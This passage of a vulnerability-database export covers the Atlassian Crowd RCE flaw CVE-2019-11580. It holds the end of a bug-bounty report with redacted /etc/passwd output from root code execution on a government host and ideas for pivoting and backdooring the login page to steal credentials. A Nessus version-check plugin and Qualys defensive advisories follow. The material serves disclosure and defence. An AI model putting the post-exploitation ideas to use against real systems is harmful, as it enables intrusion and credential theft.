user\":/var/empty/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:47:47::/var/spool/mqueue:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:51:51::/var/spool/mqueue:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:74:74:Privilege-separated SSH:/var/empty/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:81:81:System message bus:/:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:500:500:EC2 Default User:/home/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/bin/bash\n```\n\n## Product, Version, and Configuration (If applicable)\n```\nCrowd or Crowd Data Center from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x)\nCrowd or Crowd Data Center from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x)\nCrowd or Crowd Data Center from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x)\nCrowd or Crowd Data Center from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x)\nCrowd or Crowd Data Center from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x)\n```\n\n## Suggested Mitigation/Remediation Actions\nI recommend updating to the latest version of Atlassian Crowd, but if that's not possible, follow mitigation options in the advisory.\n\n## Impact\n\nRemote code execution on https://\u2588\u2588\u2588. An attacker could exploit this vulnerability to pivot into NIPRNet and gain access to other applications. Since Atlassian Crowd is an Identity management / Single Sign-on application, an attacker could exploit this vulnerability to gain access to any applications using Crowd for sign-ons. 
\n\n\nSince this is running as root, an attacker could also easily backdoor the login page and steal credentials.\n\nThanks,\nCorben Leo (@cdl)", "modified": "2019-10-04T15:14:59", "published": "2019-06-30T03:11:39", "id": "H1:632721", "href": "https://hackerone.com/reports/632721", "type": "hackerone", "title": "U.S. Dept Of Defense: Root Remote Code Execution on https://\u2588\u2588\u2588", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-10-31T05:28:00", "description": "The version of Atlassian Crowd installed on the remote host is 2.1.x prior\nto 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 \nor 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution\n(RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by\nusing pdkinstall development plugin, to install arbitrary plugins, which permits\nremote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-28T00:00:00", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11580"], "modified": "2019-05-28T00:00:00", "cpe": ["cpe:/a:atlassian:crowd"], "id": "CROWD_3_4_4.NASL", "href": "https://www.tenable.com/plugins/nessus/125477", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125477);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/30\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_xref(name:\"IAVA\", value:\"2020-A-0499\");\n\n script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x 
< 3.4.4 RCE Vulnerability\");\n script_summary(english:\"Checks the version of Crowd\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected\nby an remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Crowd installed on the remote host is 2.1.x prior\nto 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 \nor 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution\n(RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by\nusing pdkinstall development plugin, to install arbitrary plugins, which permits\nremote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nport = get_http_port(default:8095);\n\napp = \"crowd\";\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.1.0\", \"fixed_version\" : \"3.0.5\" },\n { \"min_version\" : \"3.1.0\", \"fixed_version\" : \"3.1.6\" },\n { \"min_version\" : \"3.2.0\", \"fixed_version\" : \"3.2.8\" },\n { \"min_version\" : \"3.3.0\", \"fixed_version\" : \"3.3.5\" },\n { \"min_version\" : \"3.4.0\", \"fixed_version\" : \"3.4.4\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-01-06T00:22:53", "bulletinFamily": "blog", "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-13379", "CVE-2018-15961", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-19781", "CVE-2019-3398", "CVE-2019-8394", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1472"], "description": "**Update Jan 5, 2021**: New patching section with two new 
dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\n**Update Dec 23, 2020**: Added a new section on compensating controls.\n\n**Update Dec 22, 2020**: FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.\n\nUsing Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n**Original post**: On December 8, 2020, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon. It is unclear today if the attackers intend to use the tools themselves or if they intend to release the tools publicly in some way. \n\n\u201cThe attackers tailored their world-class capabilities specifically to target and attack FireEye. They are highly trained in operational security and executed with discipline and focus. They operated clandestinely, using methods that counter security tools and forensic examination,\u201d said Kevin Mandia, CEO of FireEye. However, the stolen tools did not contain zero-day exploits. \n\nIn response to the breach, FireEye has provided Red Team tool countermeasures which are [available on GitHub](<https://github.com/fireeye/red_team_tool_countermeasures>). These countermeasures include rules in multiple languages such as Snort, Yara, ClamAV and HXIOC. 
Since none of the leaked tools leverage zero-day attacks, FireEye also provided a [listing of CVEs](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) used by these tools. \n\nAn analysis of these tools shows that the functionality and capabilities may mimic some existing red team tools such as Metasploit or Cobalt Strike. Similar to how the Shadow Brokers leak led to outbreaks such as WannaCry, it is possible that this breach could lead to other commodity malware leveraging these capabilities. Any time there is high-fidelity threat intelligence such as the countermeasures provided by FireEye, it is important to look at it under the lens of how you can protect your organization going forward, as well as how you can validate if this has been used in your organization previously. \n\n### Mitigation & Protection \n\n[Snort](<https://www.snort.org/>) is an open-source intrusion prevention system (IPS) which uses an open format for its rule structure. While many companies use the open-source version of Snort, commercial IPS tools are also able to leverage the Snort rule format. Most of these rules are tuned to specifically look for beacon traffic or components of remote access tools. If your organization is using an IPS or IDS, you should plug in these signatures to look for evidence of future exploitation.\n\n[ClamAV](<https://www.clamav.net/>) is an open-source antivirus engine which is now owned by Cisco. To prevent these tools from executing on the endpoint, the provided signatures can be imported into this AV engine or any other antivirus which uses the ClamAV engine.\n\n[Yara](<https://github.com/VirusTotal/yara>) was designed by VirusTotal to help malware researchers both identify and classify malware samples. Yara can be used as a standalone scanning engine or built in to many endpoint security products as well. 
The provided rules can be imported into many endpoint security tools to match and block future execution of known malware.\n\nAnother important aspect for preventing the usage of these red teaming tools in your environment is to address the vulnerabilities they are known to exploit. There are 16 vulnerabilities which have been prioritized based on the CVSS score associated with them. Using a vulnerability management product such as [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can proactively search which endpoints or devices have these vulnerabilities and deploy patches or configuration fixes to resolve them before an adversary has a chance to exploit them. \n\n### Threat Hunting \n\nHunting for evidence of a breach is just as important as trying to prevent the breach. Two of the components FireEye released to help this search are HXIOC and Yara rules. These help define what triggers to look for to make the determination if the organization has been breached by these tools. \n\nThe HXIOC rules provided are based on the [OpenIOC](<https://github.com/mandiant/OpenIOC_1.1>) format originally created by Mandiant. These are similar to the STIX and CyBOX formats maintained by [OASIS](<https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti>). The rules provided by FireEye call out many process names and associated command line arguments which can be used to hunt for the evidence of an attack. \n\nBy using the provided Yara rule which encompasses all of the Yara countermeasures, you can scan multiple directories using the standalone Yara engine by issuing the \u201cyara -r all-rules.yara <path>\u201d, where <path> is the location you want to recursively scan. \n\nAlternatively, VirusTotal also has a useful API called [RetroHunt](<https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt>) which allows you to scan files submitted within the last 12 months. 
[Florian Roth](<https://twitter.com/cyb3rops/status/1336583694912516096>) has gone through and submitted all of the provided Yara rules to RetroHunt and created a [Google Sheets document](<https://docs.google.com/spreadsheets/d/1uRAT-khTdp7fp15XwkiDXo8bD0FzbdkevJ2CeyXeORs/edit>) containing all of the detections. In this document you can see valuable information such as the number of detections and file hashes for each of the detected samples. \n\n### Detect 16 Publicly Known Vulnerabilities using Qualys VMDR \n\nHere is a prioritized list of CVEs published on [Github](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) by FireEye:\n\n**CVE** **ID**| **Name**| **CVSS**| **Qualys** **QID(s)** \n---|---|---|--- \nCVE-2019-11510| Pre-auth arbitrary file reading from Pulse Secure SSL VPNs| 10| 38771 \nCVE-2020-1472| Microsoft Active Directory escalation of privileges| 10| 91668 \nCVE-2018-13379| pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN| 9.8| 43702 \nCVE-2018-15961| RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell)| 9.8| 371186 \nCVE-2019-0604| RCE for Microsoft Sharepoint| 9.8| 110330 \nCVE-2019-0708| RCE of Windows Remote Desktop Services (RDS)| 9.8| 91541, 91534 \nCVE-2019-11580| Atlassian Crowd Remote Code Execution| 9.8| 13525 \nCVE-2019-19781| RCE of Citrix Application Delivery Controller and Citrix Gateway| 9.8| 150273, 372305 \nCVE-2020-10189| RCE for ZoHo ManageEngine Desktop Central| 9.8| 372442 \nCVE-2014-1812| Windows Local Privilege Escalation| 9| 91148, 90951 \nCVE-2019-3398| Confluence Authenticated Remote Code Execution| 8.8| 13475 \nCVE-2020-0688| Remote Command Execution in Microsoft Exchange| 8.8| 50098 \nCVE-2016-0167| local privilege escalation on older versions of Microsoft Windows| 7.8| 91204 \nCVE-2017-11774| RCE in Microsoft Outlook via crafted document execution (phishing)| 7.8| 110306 \nCVE-2018-8581| Microsoft Exchange Server escalation 
of privileges| 7.4| 53018 \nCVE-2019-8394| Arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus| 6.5| 374547 \n \nQualys released several remote and authenticated QIDs for CVEs published by FireEye. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid: [38771, 91668, 43702, 371186, 110330, 91541, 91534, 13525, 150273, 372305, 372442, 91148, 90951, 13475, 50098, 91204, 110306, 53018, 374547]_\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n\n\nWith VMDR Dashboard, you can track these 16 publicly known vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [FireEye Theft Top 16 CVEs & IOC Hashes](<https://qualys-secure.force.com/customer/s/article/000006470>) dashboard. \n\n \n\n### **Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools** \n\nTo reduce the overall security risk, it is important to address misconfigurations associated with the CVEs in addition to general security hygiene and system hardening. \n\nQualys customers can leverage the newly released policy \u201c_Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools_.\u201d This policy contains controls which can be used as workarounds / mitigations for these vulnerabilities if patching cannot be done immediately. 
\n\n**Control List: ** \n\nCVE IDs| Control ID | Statement \n---|---|--- \nCVE-2020-1472| 20002| Status of the 'Domain controller: Allow vulnerable Netlogon secure channel connections' Group policy setting \nCVE-2018-13379 | 20010 | Status of the source interface setting for SSL-VPN \nCVE-2019-19781| 13952 | Status of 'Responder' feature configured on the appliance \nCVE-2019-19781 | 20011 | Status of the responder action configured on the device \nCVE-2019-19781 | 20008 | Status of the responder policies configured on the device \nCVE-2019-19781 | 20009 | Status of the responder global binds configured on the device \nCVE-2016-0167 | 19440 | Status of Trust Center "Block macros from running in Office files from the Internet" setting for a user profile \nCVE-2018-8581 | 20007 | Status of the 'DisableLoopbackCheck' setting \nCVE-2019-0708 | 10404 | Status of the 'Require user authentication for remote connections by using Network Level Authentication' setting \nCVE-2019-0708 | 7519 | Status of the 'Allow users to connect remotely using Remote Desktop Services (Terminal Services)' setting \nCVE-2019-0708 | 1430 | Status of the 'Terminal Services' service \nCVE-2019-0708 | 3932 | Status of the 'Windows Firewall: Inbound connections (Public)' setting \nCVE-2019-0708 | 3948 | Status of the 'Windows Firewall: Inbound connections (Private)' setting \nCVE-2019-0708 | 3949 | Status of the 'Windows Firewall: Inbound connections (Domain)' setting \nCVE-2019-0708 | 3950 | Status of the 'Windows Firewall: Firewall state (Public)' setting \nCVE-2019-0708 | 3951 | Status of the 'Windows Firewall: Firewall state (Private)' setting \nCVE-2019-0708 | 3952 | Status of the 'Windows Firewall: Firewall state (Domain)' setting \nCVE-2019-0708 | 11220 | List of 'Inbound Rules' configured in Windows Firewall with Advanced Security via GPO \nCVE-2017-11774 | 13843 | Status of the 'Do not allow folders in non-default stores to be set as folder home pages' setting \nCVE-2017-11774 | 20003 | 
Status of the 'EnableRoamingFolderHomepages' registry setting \nCVE-2017-11774 | 20004 | Status of the 'Do not allow Home Page URL to be set in folder Properties' Group policy setting \n \nWith Qualys Configuration Management, you can easily identify misconfigured systems in context of these vulnerabilities. The screenshot below shows the total passing and failing controls for the impacted assets in the report.\n\n\n\nView control posture details with remediation steps. The screenshot below shows control pass/fail details along with actual evidence from impacted asset. \n\n\n\n### FireEye Disclosure of the Theft of their Red Team Assessment Tools \n\nHackers now have an influential collection of new techniques to draw upon. Qualys released a new RTI for Solorigate/SUNBURST vulnerabilities so customers can effectively prioritize these CVEs in their environment.\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following real-time threat indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n### Remediate FireEye-Related Vulnerabilities with Qualys Patch Management\n\n#### Identify and Install Needed Patches\n\nTo view the relevant missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools you may run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>):\n \n \n (qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273])\n\n\n\nIt is highly recommended to select all the patches returned by this QQL and add them to a new on-demand patch job. You can then target as many assets as possible and deploy the patch job as soon as possible. 
Note that the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) will only deploy the right patch to the right asset, meaning the Qualys patch job will do the mapping of patch to asset (so you don\u2019t have to) ensuring only the right patch is deployed to the right asset (in terms of binary architecture, OS version, etc). In addition, if a patch is not needed by a specific asset the Qualys agent will \u201cskip\u201d this asset and the patch will not be deployed.\n\nThe same QQL can be used in the patch assets tab in order to see all the assets that miss at least one of the FireEye-related patches:\n\n\n\n#### Visualize Assets Requiring Patches\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. These widgets will show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\nSteps to Import the Widget:\n\n * Click on "Setting" icon in "Dashboard" section.\n * Select "Import New Widget" option.\n * Enter a name of your choice for the widget.\n * Browse the JSON file to import.\n * Click on "Import" button.\n * On success, you should see the new widget in your Dashboard.\n\nYou can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article. \n\n### Hunting in Endpoint Detection and Response (EDR) \n\nThere are two components to hunt for evidence of these tools using the [Qualys EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). The first is looking for evidence of the files from the provided Yara signatures. Qualys has taken the file hashes from the RetroHunt tool and created a dashboard. With a single click you can find evidence of any matches in your environment. \n\nThe second component is hunting for evidence of the processes outlined in the OpenIOC signatures. 
While these signatures cannot be imported directly into Qualys EDR, the Qualys Labs team is converting these into Qualys Query Language (QQL) which can be used in the Qualys EDR hunting page. An example provided here shows hunting for [this Seatbelt signature](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/rules/BELTALOWDA/supplemental/hxioc/SEATBELT%20\\(UTILITY\\).ioc>). In the coming days, these hunting queries will be available to all Qualys EDR customers. \n\n\n\n\n\n### Get Started Now \n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority publicly known vulnerabilities. \n\nStart your [Qualys EDR trial](<https://www.qualys.com/apps/endpoint-detection-response/>) to protect the entire attack chain, from attack and breach prevention to detection and response using the power of the Qualys Cloud Platform \u2013 all in a single, cloud-based app. \n\nStart your [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) trial to access the Live Threat Intelligence Feed that displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details. 
\n\n### References \n\n<https://github.com/fireeye/red_team_tool_countermeasures>\n\n<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>\n\n<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>\n\n<https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html>", "modified": "2020-12-10T00:48:29", "published": "2020-12-10T00:48:29", "id": "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-23T16:02:16", "bulletinFamily": "blog", "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts," said the NSA advisory. 
It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of the 25 publicly known vulnerabilities (CVEs) published by the NSA, along with the affected products and the associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 
12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3, and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. 
You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * \n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize these vulnerabilities using the "Active Attack" RTI:\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable hosts through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities.\n\n\n\nWith VMDR Dashboard, you can track the 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. 
With trending enabled for dashboard widgets, you can keep track of these vulnerability trends in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploitation, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * An organization's vigilance team should keep a close eye on indicators of compromise (IOCs) and maintain strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "modified": "2020-10-22T23:10:29", "published": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-10-22T15:51:14", "bulletinFamily": 
